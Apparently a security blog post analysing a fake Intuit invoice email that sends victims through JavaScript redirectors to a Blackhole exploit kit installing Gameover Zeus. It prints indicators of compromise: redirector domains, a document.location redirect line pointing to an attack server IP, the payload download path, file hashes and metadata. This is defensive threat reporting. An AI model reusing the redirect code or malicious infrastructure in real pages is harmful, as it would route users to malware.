‘Download your intuit.com invoice’ installing Gameover Zeus

Subject: Dowload your Intuit.com invoice.
URL: hxxp://randkawciemno.co[.]uk/yGnRR231/index.html

Download your intuit.com invoice.
The text ‘Submit your feedback here’ contains a hyperlink to a URL as shown above which was hosted at IP address 200.98.246.235. This page contains no content but only 5 JS:

joseduranv[.]com /CusMduaN/js.js
primeenglish.com[.]hk /nEkdjYbc/js.js
sarasontv.co[.]uk /cq0gC8Qy/js.js
sviesa[.]org /x1qvg02X/js.js
himalyanacoustics[.]com /4oca5sVi/js.js
These javascript redirectors contain the following document.location script that send victims to a Blackhole Exploit kit at 173.224.71.132:

document.location=’hxxp://173.224.71.132:8080/showthread.php?t=73a07bcb51f4be71′;

It downloadeds Gameover Zeus (installer) from the following location:

173.224.71.132:8080 /q.php?f=14095&e=2

File: about.exe
MD5: edb02865d8a68d8e523bf0045d1ca90f
Size: 2,97,472 bytes

This Gameover variant is detected by 34 of 43 AV vendors on VirusTotal. It then installs Zeus in %APPDATA% which had following properties:

File: yqda.exe
MD5: a209653865219e53f29ec3d5f3afb5ca
Size: 2,97,472 bytes
Other: This file is digitally signed by ‘123f4123’
Company Name: 2q3wet Corporation
File Description: Windows TaskManager
Internal Name: taskmgr
Legal Copyright: Copyright (C) 2q3wet Corp. 1991-1999
Original Filename: taskmgr.exe
Product Name: 2q3wet(R) Windows (R) 2000 Operating System
Timestamp: 2012:03:04 15:01:05+01:00
This Gameover variant is detected by 27 of 43 AV vendors on VirusTotal.

The Gameover variant had a bot id of “mmz4” cid of “5555”. Looking at the time stamp of installed variant and bot id of “mmz4”, it looks to be an old build. Since this was an old build, it could not reach to its dropzone and therefore it had fallen back onto its dropzone domains generated using DGA.

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: